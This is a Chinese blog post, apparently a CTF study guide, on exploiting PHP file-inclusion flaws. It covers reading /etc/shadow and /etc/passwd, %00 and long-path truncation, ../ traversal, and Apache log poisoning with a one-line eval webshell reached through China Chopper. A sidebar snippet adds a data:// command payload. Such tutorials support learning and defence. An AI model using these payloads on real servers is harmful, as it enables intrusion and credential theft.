ctf linux漏洞加固,[原创]个人整理文件包含漏洞攻略

最新推荐文章于 2024-03-11 13:13:39 发布
VIP文章 最新推荐文章于 2024-03-11 13:13:39 发布
阅读量942 收藏
点赞数
文章标签: ctf linux漏洞加固

文件包含漏洞解题思路:

1、观察提示,是否为系统文件,如win.ini在windows系统的c:/windows/win.ini中,boot.ini在windows系统的c:/boot.ini中

linux里有:/etc/shadow /etc/passwd

2、带入文件,如果有后缀被自动加上,如果报错,尝试加入%00进行截断,如果报错,尝试加入绝对路径,比如c:/windows/win.ini%00,如果报错,尝试使用.....达到256个字符进行截断,尝试加入../,可以多加几个,因为在有的包含中代码中会加上一个路径前缀,所以我们必须通过../来规避这个前缀,一般3-5个左右,一般就是%00截断、.....256字符截断、绝对路径、相对路径等挨个尝试;

注意:

在Windows系统下,某些PHP版本的文件系统模块对于文件名后面所跟的“.”或者“./”或者“\”或者“/”或者“.”都会自动过滤而正常读写文件,或者通过增加%00进行截断,如Filename%00.php:

Filename///...(252个/)…/.php

Filename\...(252个)….php

Filename./././...(126个./)…./.php

Filename......(126个)…..php

Filename……(252个.)…..…...php

在Linux系统下,某些PHP版本的文件系统模块对于文件名后面所跟的“/.”或者“/”都会自动过滤而正常读写文件。据此可构造恶意的文件路径,又因为Linux下文件路径最大长度为4096,因此只需构造如下字符串即可路径截断:

Filename///...(4090个/)…/.php

Filename/././....(2045个/.)…/..php

3、apache的日志包含,

1)首先通过post或者get访问Apache服务器

http://192.168.31.14/demo1.php?name=<?php @eval($_POST['xyfy']);?>

2)通过burpsuite进行抓包,抓到包之后把包里被URLencode的替换掉,日志文件里包含一句话木马

3)文件包含Apache日志文件

http://192.168.31.14/demo1.php?name=D:\software\wamp\logs\access.log

4)使用菜刀链接

最低0.47元/天 解锁文章
卞老板
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络渗透实验四 CTF实践
qq_40525803的博客
12-05 555
网络渗透实验四 CTF实践 实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取等相关工具的使用。 系统环境:Kali Linux 2、WebDeveloper靶机来源:https://www.vulnhub.com/ 实验工具:不限 实验原理: 1、什么是CTF CTF(Capture The Flag)文一般译
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件打包了所需的所有环境...
linux系统漏洞加固
04-18
一. 账号口令 1.1 检查设备密码复杂度策略(高危) 1.2 检查口令最小长度(高危) 1.3 检查是否设置口令更改最小间隔天数(高危) 1.4 检查是否设置口令生存周期(高危) 1.5 检查是否设置口令过期前警告天数(高危) 1.6 检查是否存在空口令账号(高危) 1.7 检查是否设置除root之外UID为0的用户(危) 二. 认证授权 2.1 检查用户目录缺省访问权限设置(高危) 2.2 检查用户umask设置(危) 2.3 检查重要文件属性设置(危) 2.4 检查重要目录或文件权限设置(危) 2.5 检查是否设置ssh登录前警告Banner(低危) 三. 日志审计 3.1 检查是否对登录进行日志记录(高危) 3.2 检查是否启用cron行为日志功能(低危) 3.3 检查是否配置su命令使用情况记录(低危) 3.4 检查日志文件是否非全局可写(低危) 3.5 检查安全事件日志配置(低危) 3.6 检查是否记录用户对设备的操作(低危) 3.7 检查是否配置远程日志功能(低危) 四. 协议安全 4.1 检查是否禁止root用户远程登录(高危) 4.2 检查是否禁止匿名用户登录FTP(高危) 4.3 检查使用IP协议远程维护的设备是否配置SSH协议,禁用telnet协议(高危) 4.4 检查是否修改snmp默认团体字(危) 4.5 检查系统openssh安全配置(危) 4.6 检查是否禁止root用户登录FTP(危) 五. 其他安全 5.1 检查是否使用PAM认证模块禁止wheel组之外的用户su为root(高危) 5.2 检查是否设置命令行界面超时退出(高危) 5.3 检查是否关闭不必要的服务和端口(高危) 5.4 检查是否关闭系统信任机制(高危) 5.5 检查是否删除了潜在危险文件(高危) 5.6 检查系统core dump设置(危) 5.7 检查root用户的path环境变量(危) 5.8 检查系统是否禁用ctrl+alt+del组合键(危) 5.9 检查密码重复使用次数限制(危) 5.10 检查是否配置用户所需最小权限(危) 5.11 检查系统内核参数配置(危) 5.12 检查FTP用户上传的文件所具有的权限(低危) 5.13 检查/usr/bin/目录下可执行文件的拥有者属性(低危) 5.14 检查是否按用户分配账号(低危) 5.15 检查历史命令设置(低危) 5.16 检查系统磁盘分区使用率(低危) 5.17 检查日志文件权限设置(低危) 5.18 检查是否设置系统引导管理器密码(低危) 5.19 检查是否限制FTP用户登录后能访问的目录(低危) 5.20 检查是否设置ssh成功登录后Banner(低危) 5.21 检查是否使用NTP(网络时间协议)保持时间同步(低危) 5.22 检查是否关闭IP伪装和绑定多IP功能(低危) 5.23 检查是否限制远程登录IP范围(低危) 5.24 检查NFS(网络文件系统)服务配置(低危) 5.25 检查拥有suid和sgid权限的文件(低危) 5.26 检查是否配置定时自动屏幕锁定(适用于具备图形界面的设备)(低危) 5.27 检查是否安装chkrootkit进行系统监测(低危) 5.28 检查是否对系统账号进行登录限制(低危) 5.29 检查是否禁用不必要的系统服务(低危) 5.30 检查别名文件/etc/aliase(或/etc/mail/aliases)配置(低危) 5.31 检查账户认证失败次数限制(低危) 5.32 检查telnet Banner 设置(低危) 5.33 检查FTP Banner设置(低危) 5.34 检查是否关闭数据包转发功能(适用于不做路由功能的系统)(低危) 5.35 检查是否安装OS补丁(低危) 5.36 检查是否按组进行账号管理(低危) 5.37 检查是否删除与设备运行、维护等工作无关的账号(低危)
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
文件包含做题做题复现及方法总结
最新发布
2301_80105510的博客
03-11 875
pos(localeconv())得到点号,因为scandir(’.’)表示得到当前目录下的文件,所以scandir(pos(localeconv()))就能得到flag.php了。实验结果证明了以上的论述,要想绕过这个“黑洞“,需要往里面传入两个参数,shell会执行第一个参数,将第二个参数带入到黑洞,上图实验最后一条语句也证明了这个论述。但是过滤了flag,传入flag.php是行不通的,这时候可以使用data://text/plain,c=tac flag.php%26%26ls或?
对于CTF的见解
m0_73239569的博客
10-13 1506
起源: CTF全称为Capture The Flag(夺旗赛)它起源于1996 年DEFCON全球黑客大会,是网络安全爱好者之间的竞技游戏。通过不断的发展,它已经成为全球范围网络安全圈流行的竞赛形式,而 DEFCON 作为 CTF 赛制的发源地, DEFCON CTF 也成为了目前全球最高技术水平和影响力的 CTF 竞赛,类似于 CTF 赛场的“世界杯”。 从2002年开始,DEFCOM CTF由专业团队搭设比赛平台、命题采用自动化评分。2013年全球巨变了五十多场国
缓解机制linux,ctf pwn的缓解机制及其原理
weixin_32050773的博客
05-14 137
不可执行位 NX BitNX(Non-eXecute)位是一种针对 shellcode 执行攻击的保护措施, 意在更有效地识别数据区和代码区。该技术在 1997 年时被首次提出, 2004 年之后广泛应用于 Linux 与 Windows 操作系统上。众所周知, CPU 无法识别内存的“数据”是指令还是用户数据, 如果 CPU 的 EIP 指向了攻击者控制的区域, 攻击者可以在此部署自己的 sh...
BUUCTF 加固题 Ezsql WriteUp
柠檬i的博客
01-15 7551
本题的web界面是登录界面,界面含有sql注入漏洞,题目要求进入目标服务器修复漏洞,然后进行Check,Check True即可返回flag值
【网络安全】CTF/AWD实战速胜指南,《AWD特训营》
等风来
10-13 4507
【文末送书】今天推荐一本网安领域优质书籍《AWD特训营》,本文将从其内容与优势出发,详细阐发其对于网安从业人员的重要性与益处。随着网络安全问题日益凸显,国家对网络安全人才的需求持续增长,随着知识的指数式增长及政策扶持,安全行业也迎来了春天。为了帮助读者了解AWD竞赛的各项内容以及攻防技术与工具的实际应用,《AWD特训营》应运而生在本书,作者通过其丰富的参赛经验、长期的攻防对抗技术积累,围绕常见工具、常见加固措施、常见攻击手法、常见漏洞分析等展开“手把手”教学。本书是包含技术解析和技巧的真正的“实战指南”。
CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
Yatere的天平秤
12-21 6756
一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”,无论什么形式,这些都需要我们对于服务器的防护工作有所了解。对于线下赛,笔者虽说没有什么很高超的攻防技巧,但也是有着一些自己的心得。本文总结了一些CTF线下赛常用的服务器加固姿势,希望能对各位CTF朋友们有所帮助。环境针
【BUUCTF 加固题】Ezsql 速通
人若无名,便可专心练剑
02-16 1267
【BUUCTF 加固题】Ezsql 速通
PHPfile_get_contents的使用方法
Jack huang的专栏
03-26 7371
$data=file_get_contents("php://input"); php://input 是个可以访问请求的原始数据的只读流。 POST 请求的情况下,最好使用 php://input 来代替 $HTTP_RAW_POST_DATA,因为它不依赖于特定的 php.ini 指令。 而且,这样的情况下 $HTTP_RAW_POST_DATA 默认没有填充, 比激活 always_p......
你不知道的文件上传漏洞php代码分析
12-18
文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_...
ctf漏洞
02-22
ctf漏洞
CTF逆向指南
Fiverya的博客
09-19 7492
CTF比赛, CTF逆向题目除了需要分析程序工作原理, 还要根据分析结果进一步求出FLAG。逆向在解题赛制单独占一类题型, 同时也是PWN题的前置技能。在攻防赛制常与PWN题结合。CTF逆向主要涉及到逆向分析和破解技巧,这也要求有较强的反汇编、反编译、加解密的功底。 CTF的逆向题目一般常见考点 1、常见算法与数据结构。 2、各种排序算法, 树, 图等数据结构。 3、识别加密算法与哈希算法代码特征,识别算法魔改的部分。 4、代码混淆, 代码虚拟化, 修改代码流程, 反调
[阅读型]CTFlinux pwn的四大基本防御措施
easy_level1的博客
04-13 1404
讨论linux pwn对二进制文件常见的四个基本防御措施 RELRO NX CANARY PIE
CTF权威指南 笔记 -第四章Linux安全机制-4.1-Stack Canaries
m0_64180167的博客
05-15 615
canaries可以分为3类具体实现是栈溢出许多都是由于字符串操作不正当 (strcpy)所产生的字符串的结尾一般都是NULL \X00 结尾 换个角度就是容易被 00截断这里就是把低位设置为 \x00 既可以防止被泄露 又可以防止被伪造截断字符还包括 CR(0X0d) LF(0x0a) EOF(0xff)防止canaries 被攻击者猜到 random canaries 通常在程序初始化的时候生成随机数 并且保存在相对安全的位置当然 如果攻击者知道他的位置 还是有可能被读取。
ctflinux内核态的漏洞挖掘与利用系列1
weixin_57543652的博客
01-09 217
接下来需要编译文件系统了,这里使用busybox进行编译,下载好源码后,通过make menuconfig控制编译选项,在build options选择static binary,接下来执行 make install 可在当前目录生成一个_install目录,保存着编译后的文件,之后通过下面的脚本对系统运行时所需内容进行初始化,需在_install 目录下进行。Linux系统,用户空间通过向内核空间发出Syscall,产生软断,从而让程序陷入内核态,执行相应的操作。实际上,是进程在帮助我们完成各种任务。
CTF---Web---文件包含---08---boot.ini
qq_22160557的博客
07-28 482
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTF—Web—文件包含—08—boot.ini 一、题目描述 题目: 欢迎贵客到访,寒舍乃使用Windows搭建,且看君如何获取进门宝匙。 链接:http://172.16.15.216/stage/11/show.php?file=says 提示:boot.ini 二、解题步骤 1、 构造payload 解题过程:三,四个…/与%00截断结合 …/为路径匹配,%00为目录截断 http://172.16.15.2

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值